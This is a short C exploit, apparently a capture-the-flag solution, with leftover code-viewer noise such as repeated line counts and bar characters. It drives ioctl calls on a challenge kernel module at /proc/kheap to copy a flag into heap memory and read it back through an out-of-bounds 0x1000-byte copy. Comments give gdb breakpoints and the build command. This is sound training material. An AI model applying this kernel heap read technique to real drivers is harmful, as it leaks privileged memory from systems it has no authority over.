34 lines
889 B
C
34 lines
889 B
C
#include <stdio.h>
|
|
#include <sys/ioctl.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <fcntl.h>
|
|
#include <string.h>
|
|
#define CMD_PRINT 22274
|
|
#define CMD_COPY_FLAG 22276
|
|
#define CMD_COPY_TO_USER 22272
|
|
#define CMD_COPY_FROM_USER 22273
|
|
struct kheap_req_t {
|
|
void * ubuf;
|
|
size_t size;
|
|
};
|
|
int main() {
|
|
int fd = open("/proc/kheap", O_RDWR);
|
|
char buf[0x1000] = {0};
|
|
struct kheap_req_t req = {buf, 0};
|
|
req.size = 0x200;
|
|
memset(buf, '0', 0x1000);
|
|
ioctl(fd, CMD_COPY_FROM_USER, &req);
|
|
for (int i = 0; i < 0x1000; i++)
|
|
ioctl(fd, CMD_COPY_FLAG, &req);
|
|
req.size = 0x1000;
|
|
ioctl(fd, CMD_COPY_TO_USER, &req);
|
|
printf("%s", &buf[0x200]);
|
|
return 0;
|
|
}
|
|
// $ sudo cat /proc/modules
|
|
// gdb> add-symbol-file /challenge/challenge1.ko 0xffffffffc0000000
|
|
// gdb> b kheap_open
|
|
// gdb> b kheap_ioctl
|
|
// A slot is 0x200 bytes.
|
|
// $ gcc exploit.c -o exploit
|